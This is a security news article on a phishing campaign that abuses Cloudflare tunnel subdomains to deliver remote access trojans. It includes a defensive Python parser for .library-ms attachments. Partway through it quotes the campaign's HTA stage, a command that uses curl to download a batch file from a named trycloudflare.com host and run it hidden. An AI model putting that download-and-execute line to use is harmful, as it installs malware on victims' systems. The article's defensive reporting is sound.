Cybersecurity researchers have detected a complex attack campaign that abuses Cloudflare's tunnel infrastructure to distribute several remote access trojans (RATs).
Active since February 2024, this infrastructure has proven remarkably resilient and is now used as a platform for distributing malicious files and trojans that give attackers unauthorized access to the systems of unsuspecting victims.
Well-known security companies such as Forcepoint, Fortinet, Orange, and Proofpoint have extensively documented this ongoing threat, highlighting its evolving nature and growing impact on organizations worldwide.
The initial infection method begins with deceptive phishing emails carrying malicious attachments disguised as invoices or orders.
These emails frequently establish a false sense of urgency and may even include manipulated conversation threads with falsified replies to give the appearance of legitimacy.
The attachment typically uses the file format "application/windows-library+xml," which often bypasses email security gateways because it looks far more innocuous than a binary attachment.
When opened, this file establishes a connection to a remote WebDAV share hosted on Cloudflare's tunnel infrastructure.
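To show what a defender can check in such an attachment, here is an added example (not code from the report or from Sekoia) that parses a constructed Windows Library (.library-ms) file, extracts every location it points to, and flags remote hosts under trycloudflare.com; it assumes the standard Library Description XML schema, and the sample content and helper names are my own.

```python
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

LIB_NS = "{http://schemas.microsoft.com/windows/2009/library}"
SUSPICIOUS_SUFFIXES = ("trycloudflare.com",)

# Constructed sample .library-ms (hypothetical content, not a real attachment);
# the host is one of the trycloudflare.com subdomains named in the report.
SAMPLE_LIBRARY_MS = """<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@shell32.dll,-34575</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <simpleLocation>
        <url>https://malawi-light-pill-bolt.trycloudflare.com/invoice</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""


def extract_locations(xml_text):
    """Return every <simpleLocation><url> value in a Windows Library file."""
    root = ET.fromstring(xml_text)
    return [u.text.strip() for u in root.iter(LIB_NS + "url") if u.text]


def location_host(url):
    """Host of a library location ('' for local paths): handles UNC forms such
    as \\\\host\\share or \\\\host@SSL\\DavWWWRoot as well as http(s) URLs."""
    if url.startswith("\\\\"):
        host = url.lstrip("\\").split("\\", 1)[0]
        return host.split("@", 1)[0].lower()   # drop WebDAV @SSL / @port suffix
    return (urlparse(url).hostname or "").lower()   # drive letters: no host


def analyse_library(xml_text):
    """List remote locations, marking hosts under a suspicious suffix."""
    findings = []
    for loc in extract_locations(xml_text):
        host = location_host(loc)
        if not host:
            continue  # local path: nothing is fetched over the network
        flagged = any(host == s or host.endswith("." + s)
                      for s in SUSPICIOUS_SUFFIXES)
        findings.append({"url": loc, "host": host, "trycloudflare": flagged})
    return findings
```

Run against mail attachments of this content type, a single flagged finding is enough to quarantine the message for review.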
The Sekoia TDR (Threat Detection & Research) team analysts have been tracking this attack infrastructure, internally identified as the “Cloudflare tunnel infrastructure to deliver multiple RATs.”
Their analysis reveals a sophisticated multi-stage infection chain that employs several obfuscation techniques to evade detection systems.
The intricacy of this assault highlights how malicious actors consistently develop innovative strategies to elude contemporary security measures, even as we approach 2025.
The attackers use subdomains of "trycloudflare.com," including "malawi-light-pill-bolt.trycloudflare.com," "players-time-corresponding-th.trycloudflare.com," and others, to host their malicious content.
This infrastructure releases payloads that eventually establish continuous remote access to compromised systems, potentially leading to data theft and further infiltration of networks.
Working Mechanism of the Infection Chain
The process of infection commences when a user interacts with a LNK file camouflaged as a PDF document.
Instead of opening a genuine document, this shortcut triggers the execution of an HTA file fetched from the corresponding remote server. The HTA contents reveal the next step of the attack:
' Download the next stage with curl into %temp% and run it;
' window style 0 hides the console, False means do not wait for it to finish
Set oShell = CreateObject("WScript.Shell")
oShell.Run "cmd.exe /c curl -o %temp%ben.bat https://players-time-corresponding-th.trycloudflare.com/ben.bat && %temp%ben.bat", 0, false
self.Close
This script launches a BAT file that installs Python and runs obfuscated Python code, which then injects the next payload stage into "notepad.exe" processes.
For persistence, the malware establishes startup entries utilizing two VBS files and another BAT file located in the Windows Startup folder.
The final phase uses PowerShell to reflectively load a payload extracted from a downloaded JPEG image that carries a base64-encoded payload.
This lets the RAT connect to its command and control server, often using dynamic DNS services such as "duckdns.org" for communication.
Chains of infection (Source – Sekoia)
Chains of infection delivering AsyncRAT via an elaborate multi-phase process involving Windows Library files, LNK files, HTA execution, and Python injection.
The evolution of this campaign shows how threat actors continually adjust their tactics to evade security controls, underscoring the need for layered detection strategies and continuous monitoring for similar attack patterns.